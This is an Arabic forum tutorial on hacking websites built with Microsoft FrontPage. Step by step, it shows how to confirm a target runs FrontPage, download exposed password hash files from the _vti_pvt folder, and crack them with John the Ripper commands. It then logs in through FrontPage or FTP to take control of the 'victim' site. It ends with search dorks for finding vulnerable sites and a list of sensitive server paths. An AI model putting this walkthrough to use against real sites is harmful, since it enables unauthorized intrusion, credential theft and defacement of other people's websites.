شرح ثغرة فرونت بيج كامل

السلام عليكم ورحمة الله وبركاته


الكثير منكم يتسائل عن طريقة اختراق المواقع عن طريق ثغرة الفرونت بيج ويظنها صعبة
لكنها من اسهل ما يمكن ، فقط عليك التركيز والانتباه واذا صعبت عليك شيء اسال لا تخاف ،حتى تتقن الطريقة وتصير محترف
اتمنى ان يعجبكم الدرس ويحوز على رضاكم

ما هو الفرونت بيج
يعد فرونت بيج من أهم البرامج استخداماً في إنشاء صفحات الويب و اسهلها و اكثرها انتشارا لكن فية ثغره نقرتين لعرض الصورة في صفحة مستقلةه تمكنك من امتلاك موقع الضحيه

_______________________________
شرح الثغره :
عند تنصيب برنامج فرونت بيج يقوم البرنامج باقامة فولدرات وهي :
vti_pvt_/(اخطرهم)
vti_txt_/
vti_cnf_/
vti_log_/
vti_bin_/
private_/

ملاحظة:::--
تنفذ الثغرة على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
___________________________
(( كيف تعلم ان موقع ما يدعم الفرونت بيج ))
وذلك بعدة طرق ولن أذكر إلا الأسهل:
1-)بالذهاب إلى موقع netcraft netcraft
ستجد مربع على اليسار اكتب فيه اسم الموقع
مثال:[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واضغط انتر
وبعد البحث راح نشوف النتيجة التالية:
The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج
FrontPage/5.0.2.2510
3- النظام وهو
Linux
___________________
2-)او عن طريق إضافة الجملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نضيف الجملة ليصبح بهذه الطريقةhttp://www.arank.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج (يعني ان الموقع يدعم الفرونت بيج)
__________________
3-)وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا باضافه
vti_cnf_/
بعد عنوان الموقع كهذا المثال:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

_____________________
كيف يتم تطبيق الثغره ؟؟
الحين وبعد لما عرفنا ان الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال ان الموقع التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
يدعم fontpage
طيب نذهب إلى ملف vti_pvt_
يعني كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
*****strator.pwd
*****strators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
ممكت ما تلاقيها بالضبط لكن شبيهة منها
____________________________
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات
طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم : operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
______________________________
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير

=(Crack Jack)=
=(John The Ripper)=
راح نستخدم الأفضل والأكثر تداولا وهو John The Ripper
ويمكن تنزيلة من هذا الموقع :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
^^^^^^^^^^^^^^^^^^^^^^^^^^
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
^^^^^^^^^^^^^^^^^^^^^^^^^^
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
^^^^^^^^^^^^^^^^^^^^^^^^^^
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
^^^^^^^^^^^^^^^^^^^^^^^^^^
او اي موقع تحب ان تنزل البرنامج منه .
____________________________
كيف تفك التشفير بهذا البرنامج
طريقة عمل البرنامج :
بعد التحميل راح يكون اسم الملف المضغوط في جهازك
john-16w
فك ضغطه وبعدين راح ينشأ لك ملف اسمه
john-16w
حاول تغير اسمه إلى
john
بعدين تنقل الملف john إلى :c
بعد كذا تروح تنسخ اليوسر والباسوورد من الموقع الي انت حصلت فيه على الباسوورد المشفر
يعني نفرض اني حصلت على ملف الباسوورد وهذي هي:
operator:hi9LHn9wAMuKM

نحاول ننشأ ملف جديد داخل مجلد run الموجود في مجلد john
واسم الملف passwd طبعا هو نصي عشان كذا راح يصير امتداده txt

ننسخ الباسوورد واليوسر وكلمة فرونت بيج إلى ملف passwd.txt
يعني ننسخ
operator:hi9LHn9wAMuKM
إلى passwd.txt بعد كذا روح للدوز
واكتب ..cd
إلين ماتطلع من المجلدات والملفات كلها وتروح للـc
واكتب الامر
cd john
بعدين انتر ثم اكتب
cd run واضغط على انتر
وعاد ماباقي عليك الا الاوامر الخاصة بفك تشفير الباسوورد
نكتب أوامر برنامج John The Ripperوهي
john -i:all passd.txt
يبحث لك عن جميع الأنواع والاحتمالات

john -i:Alpha passwd.txt
يبحث عن الأحرف الصغيرة

john -i: Digits passwd.txt
يبحث عن الأرقام

john -i:single passwd.txt
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
_________________________________
ملاحظة:
قد يحتاج البرنامج لاسبوع حتى يتمكن من فك الشفرة (هذا اذا كان الباسوورد طويل)
طيب وش الحل
انا ماني فاضي اخلي الكمبيوتر شغال لاسبوع وش اسوي؟
عندي الحل اضغط كنترول + شفت +سي او
كنترول+سي
ctrl+shift+c
ctrl+c
لكي توقف عمل البرنامج
____________________
كيف اكمل ؟
اكتب
john -restore
وهو يكمل من اخر شيء وقفت عنده
______________________
كيف تستطيع كذلك ملاحظة سير البرنامج؟؟
من خلال الضغط على اي زر في لوحة المفاتيح وسترى جميع التخمينات لكسر هذه الكلمات المشفرة
_________________________-
كيف تستطيع ايقاف البرنامج ؟؟
من خلال الضغط على الزر (Ctrl) و(Shift) و(C)
وللفائدة اذكرها للأخوان الذين لايعلمون أغلب البرامج التي تعمل على الدوس
تستطيع الخروج منها بهذه الحركة
___________________________
هل البرنامج لايعمل إلا على كسر هذا النوع من الملفات ؟؟
لا بل يستطيع كسر اغلب كلمات السر التي تكون مشفرة لانه يستخدم شفرة (DES) وانواع اخرى
حتى اني قرأت أخيراً ان البرنامج يقوم بكسر شفرة (md5) وانواع اخرى للفائدة اذكرها مثل (BSDI) تابع

إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
(1-)
frontpage
بعدين
file وتذهب إلى
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign

- - - - - - - - - - - - - - - - - - -

(2-)
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

======================================

وألحين أكيد تبون تجربون على مواقع بس ما تعرفون مواقع تدعم الفرونت بيج؟؟؟
أقولكم روحوا google(4)
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
-----------------------------------
وعندك محرك بحث
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تكتب في محرك البحث
link:service.pwd
أو
link:*****strators
وغيرها من الملفات الاحتمال وجود password فيها

وهذه ثغرات للفرونت بيج (غير المذكورة في الاعلى)
/_private/form_results.txt
/_private/form_results.htm
/_private/register.htm
/_vti_pvt/service.cnf
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/writeto.cnf
/_vti_pvt/access.cnf
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/author.dll
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/*****istrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_pvt/writeto.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/service.cnf
/_vti_pvt/access.cnf
/_private/registrations.txt
/_vti_bin/_vti_aut/dvwssr.dll
/_private/registrations.htm
/_private/register.txt
/_private/register.htm
/_private/orders.txt
/_private/orders.htm
/_private/form_results.htm
/_private/form_results.txt
/_vti_bin/_vti_adm/*****.dll

ونقرتين لعرض الصورة في صفحة مستقلة عليك الموقع ....